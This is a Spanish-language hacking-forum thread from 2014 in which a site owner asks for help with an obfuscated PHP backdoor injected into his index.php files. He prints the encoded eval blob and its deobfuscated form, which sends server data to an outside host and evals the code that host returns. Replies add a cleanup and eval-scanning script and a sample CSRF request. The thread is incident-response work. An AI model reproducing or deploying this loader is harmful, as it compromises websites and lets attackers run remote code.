elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Ataque deface con inyeccion de codigo ofuscado.
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ataque deface con inyeccion de codigo ofuscado.  (Leído 5,696 veces)
curda

Desconectado Desconectado

Mensajes: 4


Ver Perfil WWW
Ataque deface con inyeccion de codigo ofuscado.
« en: 24 Noviembre 2014, 20:27 pm »

Saludos, he estado teniendo problemas con un ataque con una periodicidad, lo que hace es modificar mis archivos index.php y le incrusta al inicio del archivo este script:

///////////////////////////////////////////////

Código:
<?php error_reporting(0); preg_replace("/.*/e","eval(gzinflate(base64_decode('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')));",""); ?>

////////////////////////////////////////////////

En mi primer desofuscación obtengo este script:

////////////////////////////////////////

Código:
function dgeoig41383($str) {
$a = "\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";
$b = "\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65";
return $b($a($str));
}

/////////////////////////////////////////

En mi segunda desofuscación obtengo este script:

/////////////////////////////////////////

Código
  1. <?php ?><?php
  2. if (!$kjdke_b) {
  3.    global $kjdke_b;
  4.    $kjdke_b = 1;
  5.    $bkljg = $_SERVER["HTTP_USER_AGENT"];
  6.    $ghfju = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "bot", "spid", "Lynx", "PHP", "WordPress" . "integromedb", "SISTRIX", "Aggregator", "findlinks", "Xenu", "BacklinkCrawler", "Scheduler", "mod_pagespeed", "Index", "ahoo", "Tapatalk", "PubSub", "RSS");
  7.    if (!($_GET['df'] === "2") and !($_POST['dl'] === "2") and ((preg_match("/" . implode("|", $ghfju) . "/i", $bkljg)) or (@$_COOKIE['condtions']) or (!$bkljg) or ($_SERVER['HTTP_REFERER'] === "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']) or ($_SERVER['REMOTE_ADDR'] === "127.0.0.1") or ($_SERVER['REMOTE_ADDR'] === $_SERVER['SERVER_ADDR']) or ($_GET['df'] === "1") or ($_POST['dl'] === "1"))) {
  8.    } else {
  9.        foreach ($_SERVER as $ndbv => $cbcd) {
  10.            $data_nfdh.= "&REM_" . $ndbv . "='" . base64_encode($cbcd) . "'";
  11.        }
  12.        $context_jhkb = stream_context_create(array('http' => array('timeout' => '15', 'header' => "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.9) Gecko/20100101 Firefox/10.0.9_ Iceweasel/10.0.9
  13. Connection: Close
  14.  
  15. ", 'method' => 'POST', 'content' => "REM_REM='1'" . $data_nfdh)));
  16.        $vkfu = file_get_contents("http://hcolina.getce.com/session.php?id", false, $context_jhkb);
  17.        if ($vkfu) {
  18.            eval($vkfu);
  19.        } else {
  20.            ob_start();
  21.            if (!@headers_sent()) {
  22.                @setcookie("condtions", "2", time() + 172800);
  23.            } else {
  24.                echo "<script>document.cookie='condtions=2; path=/; expires=" . date('D, d-M-Y H:i:s', time() + 172800) . " GMT;';</script>";
  25.            };
  26.        };
  27.    }
  28. }
  29. ?>

/////////////////////////////////////////

Alguien sabe algo de este ataque, información que me puedan dar seria excelente.

gracias
« Última modificación: 25 Noviembre 2014, 00:40 am por simorg » En línea

- dimworks.org -
Varlch

Desconectado Desconectado

Mensajes: 100



Ver Perfil WWW
Re: Ataque deface con inyeccion de codigo ofuscado.
« Respuesta #1 en: 24 Noviembre 2014, 20:46 pm »

No estoy seguro pero creo que injecta http://hcolina.getce.com/session.php?id ese link y si tienes una sesión abierta la roba.
Pero no estoy seguro si quieres saber sobre lo que hace ese código o como fueron capaces de colocarlo.
En línea

curda

Desconectado Desconectado

Mensajes: 4


Ver Perfil WWW
Re: Ataque deface con inyeccion de codigo ofuscado.
« Respuesta #2 en: 24 Noviembre 2014, 20:55 pm »

muchas gracias, si toda información del ataque que se pueda, pues si eso parece q hace pero si me gustaría saber como logran hacer esa modificación de los archivos index.php

Pues por teoría modifique los permisos de los archivos index.php para q no se pudieran modificar así de simple y ahora me tope conque modifico los permisos a 0777 e inserto el código de nuevo.
En línea

- dimworks.org -
Varlch

Desconectado Desconectado

Mensajes: 100



Ver Perfil WWW
Re: Ataque deface con inyeccion de codigo ofuscado.
« Respuesta #3 en: 24 Noviembre 2014, 21:20 pm »

Si te injerta  código php no xss a no ser que tengas en el admin algún panel que te permita modificar archivos, pero pueden ser muchas causas desde tener un php-shell puesta por el atacante o que accedan a tu ftp, telnet o etc.

Yo miraría los log y si a no ser que este borrados como suele hacer un atacante con dos dedos de frente puedes ver que ocurre y desde que ip se ha hecho pero puede estar utilizando un proxy o una wifi publica.

Puedes denunciarlo.
En línea

curda

Desconectado Desconectado

Mensajes: 4


Ver Perfil WWW
Re: Ataque deface con inyeccion de codigo ofuscado.
« Respuesta #4 en: 24 Noviembre 2014, 23:47 pm »

Bueno por el momento desarrolle un pequeño script para corregir inmediatamente los problemas de este ataque.

Código
  1. <?php
  2.  
  3. //script para solucionar inmediatamente el ataque deface inyection por Oliver Leuyim Angel - www.dimworks.org
  4.  
  5. function search_files( $dir , &$files )
  6. {
  7.    if (is_dir($dir))
  8.    {
  9.        if ($gd = opendir($dir))
  10.        {
  11.            while (($file = readdir($gd)) !== false)
  12.            {
  13.                if ( $file != '.' AND $file != '..'  )
  14.                {
  15.                    // ¿ Dir or File ?
  16.                    if ( is_dir( $dir.'/'.$file ) )
  17.                    {
  18.                        search_files( $dir.'/'.$file , $files );
  19.                    }
  20.                    else
  21.                    {
  22.                        // Ready File
  23.                        if ( is_file( $dir.'/'.$file)  )
  24.                        {
  25.                            if($file == 'index.php'){
  26.                                $reader = file_get_contents($dir.'/'.$file,NULL,NULL,0,100);
  27.                                    if(stristr($reader,"eval")){
  28.                                        $removed = file_get_contents($dir.'/'.$file);
  29.                                        $removed = str_ireplace("<?php error_reporting(0); preg_replace(\"/.*/e\",\"eval(gzinflate(base64_decode('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')));\",\"\"); ?>","",$removed);
  30.                                        file_put_contents($dir.'/'.$file,$removed);
  31.                                        chmod($dir.'/'.$file,0644);
  32.                                    //$size = filesize( $dir.'/'.$file );
  33.                                    //$md5 = md5_file( $dir.'/'.$file );
  34.  
  35.                                    $files[ dirname($dir.'/'.$file)."/".$file  ] = filemtime( $dir.'/'.$file  );
  36.                                    }
  37.                            }
  38.                        }
  39.                    }
  40.                }
  41.            }
  42.            closedir($gd);
  43.        }
  44.    }
  45.  
  46. }
  47.  
  48.  
  49. $files = array();
  50. search_files("/home/amquere/public_html", $files );
  51. print_r($files);
  52. echo "<br>Archivos Limpios.";
  53.  
  54. echo "<br><hr>Posible php-shell:<br><br>";
  55. function search_shell( $dir , &$files )
  56. {
  57.    if (is_dir($dir))
  58.    {
  59.        if ($gd = opendir($dir))
  60.        {
  61.            while (($file = readdir($gd)) !== false)
  62.            {
  63.                if ( $file != '.' AND $file != '..'  )
  64.                {
  65.                    // ¿ Dir or File ?
  66.                    if ( is_dir( $dir.'/'.$file ) )
  67.                    {
  68.                        search_shell( $dir.'/'.$file , $files );
  69.                    }
  70.                    else
  71.                    {
  72.                        // Ready File
  73.                        if ( is_file( $dir.'/'.$file)  )
  74.                        {
  75.                            if(strstr($file,"php")){
  76.                                $reader = file_get_contents($dir.'/'.$file);
  77.                                    if(stristr($reader,"eval(")){
  78.  
  79.                                    //$size = filesize( $dir.'/'.$file );
  80.                                    //$md5 = md5_file( $dir.'/'.$file );
  81.  
  82.                                     echo dirname($dir.'/'.$file)."/".$file ." => ". filemtime( $dir.'/'.$file  )."<br>\r\n";
  83.                                    }
  84.                            }
  85.  
  86.                        }
  87.                    }
  88.                }
  89.            }
  90.            closedir($gd);
  91.        }
  92.    }
  93.  
  94. }
  95.  
  96. $files = array();
  97. search_shell("/home/amquere/public_html", $files );
  98. print_r($files);
  99.  
  100. ?>
« Última modificación: 25 Noviembre 2014, 00:41 am por simorg » En línea

- dimworks.org -
Varlch

Desconectado Desconectado

Mensajes: 100



Ver Perfil WWW
Re: Ataque deface con inyeccion de codigo ofuscado.
« Respuesta #5 en: 25 Noviembre 2014, 00:26 am »

Me permites hacer unas pruebas en tu web?
A si a simple vista te puede atacar por csrf
Código
  1. GET http://dimworks.org/cms/index.php?mod=contenido&amp=&amp=&id=29&t=4 HTTP/1.1
  2.  
  3. Host: dimworks.org
  4.  
  5. Cookie: URIID=aHR0cDovL2RpbXdvcmtzLm9yZy9jbXMvaW5kZXgucGhwP21vZD1uZXdzJmFtcD0mYW1wPSZleHQ9bmV3cyZpZD01Mg%3D%3D
  6.  
  7. Accept-encoding: gzip, deflate
  8.  
  9. Accept: */*
  10.  
  11. User-agent: w3af.org
  12.  
  13.  
« Última modificación: 25 Noviembre 2014, 00:42 am por simorg » En línea

curda

Desconectado Desconectado

Mensajes: 4


Ver Perfil WWW
Re: Ataque deface con inyeccion de codigo ofuscado.
« Respuesta #6 en: 25 Noviembre 2014, 00:43 am »

No, esa no es la web que tiene el problema.

La que tiene el problema es amqueretaro.com

saludos.
En línea

- dimworks.org -
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Python] (Ayuda) Código ofuscado.
Scripting
adrianmendezRap 8 8,109 Último mensaje 21 Abril 2012, 15:16 pm
por adrianmendezRap
Ayuda con código PHP ofuscado
Desarrollo Web
Snoosarp 8 3,087 Último mensaje 19 Abril 2017, 02:45 am
por Snoosarp
Inyección SQL + Deface
Hacking
Geormarsch 4 6,628 Último mensaje 28 Julio 2017, 18:05 pm
por engel lex
Necesito ayuda con lo que parece codigo ofuscado.
Hacking
RebelTira 0 1,719 Último mensaje 17 Abril 2018, 11:46 am
por RebelTira
Ayuda con pequeño codigo ofuscado
Programación C/C++
lvwrz 2 2,502 Último mensaje 15 Enero 2022, 22:44 pm
por .xAk.
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines